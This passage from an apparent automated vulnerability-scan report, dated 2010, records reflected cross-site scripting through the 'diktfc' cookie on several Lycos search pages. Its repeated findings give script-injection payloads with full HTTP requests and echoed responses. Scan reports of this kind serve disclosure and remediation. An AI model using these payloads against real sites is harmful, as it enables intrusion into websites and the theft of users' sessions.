Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=peoplesearch.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aea545"><script>alert(1)</script>6004c137ca9.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.370. http://peoplesearch.lycos.com/index.php [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /index.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d566a"%3balert(1)//48efc52aeab was submitted in the diktfc cookie. This input was echoed as d566a";alert(1)//48efc52aeab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.php HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad566a"%3balert(1)//48efc52aeab; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"peoplesearch.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad566a";alert(1)//48efc52aeab.lycos.com"
});
</script>
...[SNIP]...

1.371. http://search.lycos.com/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a339"><script>alert(1)</script>9a100a5a9b2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?tab=web&query=%27&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6a339"><script>alert(1)</script>9a100a5a9b2; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:24 GMT; path=/
Set-Cookie: LYCOS_SEARCH=ncif4d92tcnpmqlnmaatquk415; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=search.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6a339"><script>alert(1)</script>9a100a5a9b2.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.372. http://search.lycos.com/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82a1"%3balert(1)//5ed61034d11 was submitted in the diktfc cookie. This input was echoed as c82a1";alert(1)//5ed61034d11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=web&query=%27&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac82a1"%3balert(1)//5ed61034d11; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:25 GMT; path=/
Set-Cookie: LYCOS_SEARCH=587lfmk59vbrkvafqo83kut8a3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"search.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac82a1";alert(1)//5ed61034d11.lycos.com"
});
</script>
...[SNIP]...

1.373. http://search.lycos.com/bootstrap.js [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36a0b"%3balert(1)//178a733ee57 was submitted in the diktfc cookie. This input was echoed as 36a0b";alert(1)//178a733ee57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bootstrap.js HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A36a0b"%3balert(1)//178a733ee57; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:35:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:09 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"search.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A36a0b";alert(1)//178a733ee57.lycos.com"
});
</script>
...[SNIP]...

1.374. http://search.lycos.com/bootstrap.js [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6059"><script>alert(1)</script>3164d47745a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab6059"><script>alert(1)</script>3164d47745a; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:35:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:08 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=search.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab6059"><script>alert(1)</script>3164d47745a.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.375. http://search.lycos.com/default.asp [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /default.asp

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 599d1"><script>alert(1)</script>8a2ede2f521 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /default.asp HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A599d1"><script>alert(1)</script>8a2ede2f521; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=search.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A599d1"><script>alert(1)</script>8a2ede2f521.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.376. http://search.lycos.com/default.asp [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /default.asp

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2feaa"%3balert(1)//caad74f47b6 was submitted in the diktfc cookie. This input was echoed as 2feaa";alert(1)//caad74f47b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.asp HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2feaa"%3balert(1)//caad74f47b6; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:14 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"search.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2feaa";alert(1)//caad74f47b6.lycos.com"
});
</script>
...[SNIP]...

1.377. http://search.lycos.com/image/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1517b"><script>alert(1)</script>026051adaf3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /image/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1517b"><script>alert(1)</script>026051adaf3; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=search.lycos.com/image/&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1517b"><script>alert(1)</script>026051adaf3.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.378. http://search.lycos.com/image/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3332c"%3balert(1)//d09a29f118f was submitted in the diktfc cookie. This input was echoed as 3332c";alert(1)//d09a29f118f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /image/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3332c"%3balert(1)//d09a29f118f; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"search.lycos.com/image/",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3332c";alert(1)//d09a29f118f.lycos.com"
});
</script>
...[SNIP]...

1.379. http://search.lycos.com/video/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e92cb"><script>alert(1)</script>2113f4c409d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /video/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae92cb"><script>alert(1)</script>2113f4c409d; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:06 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=search.lycos.com/video/&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae92cb"><script>alert(1)</script>2113f4c409d.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.380. http://search.lycos.com/video/ [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 184a0"%3balert(1)//a41b54937a was submitted in the diktfc cookie. This input was echoed as 184a0";alert(1)//a41b54937a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/ HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A184a0"%3balert(1)//a41b54937a; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:07 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
